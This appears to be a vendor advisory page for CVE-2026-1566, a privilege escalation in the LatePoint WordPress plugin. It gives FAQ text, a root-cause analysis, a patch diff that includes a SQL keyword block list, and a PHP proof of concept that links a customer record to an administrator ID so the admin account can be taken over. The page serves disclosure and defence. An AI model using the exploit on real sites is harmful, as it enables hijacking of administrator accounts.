What is CVE-2026-1566?

CVE-2026-1566 is a high-severity privilege escalation vulnerability found in the LatePoint plugin for WordPress, affecting versions up to 5.2.7. It allows authenticated users with Agent-level access to escalate their privileges by linking customer accounts to arbitrary WordPress user IDs.

How does the vulnerability work?

The vulnerability arises from an insecure direct object reference (IDOR) and mass assignment issue, allowing users to set the ‘wordpress_user_id’ field when creating or updating customer records. By exploiting this, an attacker can link a customer to an admin account and reset its password.

Who is affected by this vulnerability?

Any WordPress site using the LatePoint plugin version 5.2.7 or earlier is at risk, particularly if it has users with Agent-level access. Administrators should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check for vulnerability, verify the LatePoint plugin version in your WordPress dashboard. If it is 5.2.7 or earlier, your site is vulnerable to CVE-2026-1566.

How can I fix this vulnerability?

To mitigate this vulnerability, update the LatePoint plugin to version 5.2.8 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.

What does a CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to the security of the affected system. It suggests that exploitation could lead to serious consequences, such as unauthorized access to sensitive accounts.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability could lead to an attacker gaining administrative access to your WordPress site, allowing them to modify content, access sensitive data, or take control of the site entirely. This can result in data breaches and loss of trust.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can authenticate as an Agent user, link a customer to an admin account, and reset the admin’s password. This illustrates the steps needed to exploit the vulnerability effectively.

What additional security measures can I take?

In addition to updating the plugin, consider implementing strong password policies, enabling two-factor authentication for admin accounts, and regularly auditing user roles and permissions to minimize risk.

Is there a way to monitor for exploitation attempts?

Yes, you can monitor your site’s logs for unusual activity, such as failed login attempts or unexpected changes to user roles. Security plugins can also help track and alert you to suspicious behavior.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately change all admin passwords, review user accounts for unauthorized changes, and restore your site from a clean backup if necessary. Conduct a thorough security audit to identify and remediate any vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2026-1566 can be found in the official CVE database and security advisories from WordPress security resources. Keeping abreast of security updates from plugin developers is also crucial.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1566: LatePoint <= 5.2.7 – Authenticated (Agent+) Privilege Escalation (latepoint)

CVE ID CVE-2026-1566

Plugin latepoint

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 5.2.7

Patched Version 5.2.8

Disclosed March 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1566:
The root cause is an insecure direct object reference (IDOR) and mass assignment vulnerability in the LatePoint plugin’s customer creation and update functions. The `OsCustomerModel->set_data()` method accepted a `wordpress_user_id` parameter from user input when called with the `LATEPOINT_PARAMS_SCOPE_PUBLIC` scope. This allowed authenticated users with the Agent role or higher to arbitrarily link a new or existing customer record to any WordPress user ID, including administrators. The vulnerability existed in three controller methods: `customers_controller->create()` (line 150), `customers_controller->update()` (line 181), and `orders_controller->create()` (line 131). Attackers could submit a POST request to the corresponding AJAX endpoints with a `customer[wordpress_user_id]` parameter set to a target admin’s ID. After linking the customer, an attacker could trigger the standard WordPress password reset for the linked customer email, which would reset the password for the targeted administrator account.
The patch fixes the issue by implementing proper authorization checks before allowing mass assignment of the `wordpress_user_id` field. The `set_data()` calls in the three vulnerable controller methods now conditionally use `LATEPOINT_PARAMS_SCOPE_ADMIN` only if `OsAuthHelper::is_admin_logged_in()` returns true, otherwise they restrict input to `LATEPOINT_PARAMS_SCOPE_PUBLIC`. The public scope definition presumably excludes the `wordpress_user_id` field from mass assignment. The patch also adds a secondary fix in `settings_helper->import_table_data()` (line 234) to unset `wordpress_user_id` during customer data imports, and adds a missing nonce check in `booking_form_settings_controller->reload_preview()` (line 26). Exploitation leads to full site compromise via administrator account takeover.

Differential between vulnerable and patched code

Code Diff

--- a/latepoint/latepoint.php
+++ b/latepoint/latepoint.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: LatePoint
  * Description: Appointment Scheduling Software for WordPress
- * Version: 5.2.7
+ * Version: 5.2.8
  * Author: LatePoint
  * Author URI: https://latepoint.com
  * Plugin URI: https://latepoint.com
@@ -29,7 +29,7 @@
 		 * LatePoint version.
 		 *
 		 */
-		public $version = '5.2.7';
+		public $version = '5.2.8';
 		public $db_version = '2.3.0';


--- a/latepoint/lib/controllers/booking_form_settings_controller.php
+++ b/latepoint/lib/controllers/booking_form_settings_controller.php
@@ -23,6 +23,9 @@
 		}

 		public function reload_preview() {
+			// Verify nonce.
+			$this->check_nonce( 'reload_preview' );
+
 			OsStepsHelper::set_cart_object();
 			OsStepsHelper::set_booking_object();
 			OsStepsHelper::set_restrictions();
--- a/latepoint/lib/controllers/customers_controller.php
+++ b/latepoint/lib/controllers/customers_controller.php
@@ -150,7 +150,8 @@
 			$this->check_nonce( 'new_customer' );
 			$customer = new OsCustomerModel();
 			// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-			$customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+			// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+			$customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 			if ( $customer->save() ) {
 				// translators: %s is the html of a customer edit link
 				$response_html = sprintf( __( 'Customer Created ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
@@ -180,7 +181,8 @@
 				} else {
 					$old_customer_data = $customer->get_data_vars();
 					// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-					$customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+					// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+					$customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 					if ( $customer->save() ) {
 						// translators: %s is the html of a customer edit link
 						$response_html = sprintf( __( 'Customer Updated ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
--- a/latepoint/lib/controllers/orders_controller.php
+++ b/latepoint/lib/controllers/orders_controller.php
@@ -131,8 +131,8 @@
 				$is_new_customer = true;
 			}
 			// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-			// Use 'public' role to restrict which fields can be set via user input.
-			$customer->set_data( $customer_params, LATEPOINT_PARAMS_SCOPE_PUBLIC );
+			// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+			$customer->set_data( $customer_params, OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 			if ( $customer->save() ) {
 				if ( $is_new_customer ) {
 					do_action( 'latepoint_customer_created', $customer );
--- a/latepoint/lib/helpers/customer_import_helper.php
+++ b/latepoint/lib/helpers/customer_import_helper.php
@@ -181,7 +181,7 @@
 					$save_data[$column_mapping[$column_index]] = $field_value;
 				}
 			}
-			$customer->set_data($save_data);
+			$customer->set_data($save_data, 'public');

 			if ($customer->save()) {
 				$updatedCount++;
--- a/latepoint/lib/helpers/settings_helper.php
+++ b/latepoint/lib/helpers/settings_helper.php
@@ -208,7 +208,7 @@
 			}

 			// Security check: Ensure no dangerous SQL keywords in CREATE statement.
-			$dangerous_keywords = array( 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
+			$dangerous_keywords = array( 'SELECT', 'UNION', 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
 			foreach ( $dangerous_keywords as $keyword ) {
 				if ( stripos( $create_statement, $keyword ) !== false ) {
 					throw new Exception( sprintf( __( 'Security: Dangerous SQL keyword "%s" detected in CREATE statement', 'latepoint' ), esc_html( $keyword ) ) );
@@ -231,6 +231,11 @@
 			if ( is_array( $table_data['data'] ) ) {
 				foreach ( $table_data['data'] as $row ) {
 					if ( is_array( $row ) ) {
+						// Security fix: Prevent mass assignment of wordpress_user_id during import.
+						if ( $table === $wpdb->prefix . 'latepoint_customers' ) {
+							unset( $row['wordpress_user_id'] );
+						}
+
 						$insert_result = $wpdb->insert( $table, $row );
 						if ( $insert_result === false ) {
 							// Log error but continue with other rows.
--- a/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
+++ b/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
@@ -20,20 +20,37 @@
                     </div>
                 </div>
 				<div class="bf-side-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][side_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_heading')); ?></div>
-				<div class="bf-side-desc os-editable-basic editable-setting" data-setting-key="[<?php echo $selected_step_code;?>][side_panel_description]"><?php echo strip_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_description'), ['a', 'i', 'u', 'b', 'br']); ?></div>
+				<div
+					class="bf-side-desc os-editable-basic editable-setting"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][side_panel_description]"
+				>
+					<?php echo strip_tags( OsStepsHelper::get_step_setting_value( $selected_step_code, 'side_panel_description' ), [ 'a', 'i', 'u', 'b', 'br' ] ); ?>
+				</div>
 			</div>
 			<div class="side-panel-extra os-editable editable-setting" data-setting-key="[shared][steps_support_text]">
-				<?php echo OsSettingsHelper::get_steps_support_text(); ?>
+				<?php echo wp_kses_post( OsSettingsHelper::get_steps_support_text() ); ?>
 			</div>
 		</div>
 		<div class="bf-main-panel">
 			<div class="bf-main-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_heading')); ?></div>
 			<div class="bf-main-panel-content-wrapper">
-				<div class="bf-main-panel-content-before os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_before]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_before'); ?></div>
+				<div
+					class="bf-main-panel-content-before os-editable editable-setting"
+					data-placeholder="+"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_before]"
+				>
+					<?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_before' ) ); ?>
+				</div>
 				<div class="bf-main-panel-content">
 					<?php echo OsStepsHelper::get_step_content_preview($selected_step_code); ?>
 				</div>
-				<div class="bf-main-panel-content-after os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_after]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_after'); ?></div>
+				<div
+					class="bf-main-panel-content-after os-editable editable-setting"
+					data-placeholder="+"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_after]"
+				>
+					<?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_after' ) ); ?>
+				</div>
 			</div>
 			<div class="bf-main-panel-buttons">
                 <div class="bf-btn bf-cancel-save-btn">
--- a/latepoint/lib/views/booking_form_settings/show.php
+++ b/latepoint/lib/views/booking_form_settings/show.php
@@ -14,6 +14,7 @@
     </div>
     <form class="booking-form-preview-settings"
           data-route-name="<?php echo esc_attr(OsRouterHelper::build_route_name( 'booking_form_settings', 'reload_preview' )); ?>">
+        <?php wp_nonce_field( 'reload_preview', '_wpnonce', false ); ?>
         <div class="bf-heading">
             <div class="latepoint-icon latepoint-icon-browser"></div>
             <div><?php esc_html_e( 'Appearance', 'latepoint' ); ?></div>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1566 - LatePoint <= 5.2.7 - Authenticated (Agent+) Privilege Escalation
<?php

$target_url = 'https://example.com';
$username = 'agent_user';
$password = 'agent_pass';
$target_admin_user_id = 1;

// Step 1: Authenticate as an Agent-level user to obtain WordPress cookies and nonce.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => 1
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);

// Step 2: Extract the WordPress nonce for the 'new_customer' action from the admin page.
// This is a simplified example. A real PoC would parse the admin page HTML.
$nonce = 'EXTRACTED_NONCE';

// Step 3: Exploit the mass assignment vulnerability via the create customer AJAX endpoint.
// The action parameter triggers the wp_ajax_os_customers_controller_create hook.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'os_customers_controller_create',
    'nonce' => $nonce,
    'customer' => [
        'first_name' => 'Exploit',
        'last_name' => 'Customer',
        'email' => 'attacker_controlled@example.com',
        'wordpress_user_id' => $target_admin_user_id // This is the malicious payload.
    ]
];

curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_data,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => 'cookies.txt'
]);
$ajax_response = curl_exec($ch);
curl_close($ch);

// If successful, the response will contain the new customer ID.
// The attacker can now initiate a password reset for the email linked to the customer.
// This will reset the password for the WordPress user with ID $target_admin_user_id.
echo $ajax_response;

?>

Frequently Asked Questions

What is CVE-2026-1566?
Overview of the vulnerability
CVE-2026-1566 is a high-severity privilege escalation vulnerability found in the LatePoint plugin for WordPress, affecting versions up to 5.2.7. It allows authenticated users with Agent-level access to escalate their privileges by linking customer accounts to arbitrary WordPress user IDs.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from an insecure direct object reference (IDOR) and mass assignment issue, allowing users to set the ‘wordpress_user_id’ field when creating or updating customer records. By exploiting this, an attacker can link a customer to an admin account and reset its password.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the LatePoint plugin version 5.2.7 or earlier is at risk, particularly if it has users with Agent-level access. Administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check for vulnerability, verify the LatePoint plugin version in your WordPress dashboard. If it is 5.2.7 or earlier, your site is vulnerable to CVE-2026-1566.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the LatePoint plugin to version 5.2.8 or later, where the issue has been patched. Regularly check for updates to ensure your plugins are secure.
What does a CVSS score of 8.8 mean?
Understanding severity ratings
A CVSS score of 8.8 indicates a high severity level, meaning the vulnerability poses a significant risk to the security of the affected system. It suggests that exploitation could lead to serious consequences, such as unauthorized access to sensitive accounts.
What practical risks does this vulnerability pose?
Potential impacts on your site
Exploitation of this vulnerability could lead to an attacker gaining administrative access to your WordPress site, allowing them to modify content, access sensitive data, or take control of the site entirely. This can result in data breaches and loss of trust.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of exploitation
The proof of concept provided shows how an attacker can authenticate as an Agent user, link a customer to an admin account, and reset the admin’s password. This illustrates the steps needed to exploit the vulnerability effectively.
What additional security measures can I take?
Enhancing site security
In addition to updating the plugin, consider implementing strong password policies, enabling two-factor authentication for admin accounts, and regularly auditing user roles and permissions to minimize risk.
Is there a way to monitor for exploitation attempts?
Tracking suspicious activity
Yes, you can monitor your site’s logs for unusual activity, such as failed login attempts or unexpected changes to user roles. Security plugins can also help track and alert you to suspicious behavior.
What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect a compromise, immediately change all admin passwords, review user accounts for unauthorized changes, and restore your site from a clean backup if necessary. Conduct a thorough security audit to identify and remediate any vulnerabilities.
Where can I find more information about this vulnerability?
Additional resources
More information about CVE-2026-1566 can be found in the official CVE database and security advisories from WordPress security resources. Keeping abreast of security updates from plugin developers is also crucial.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations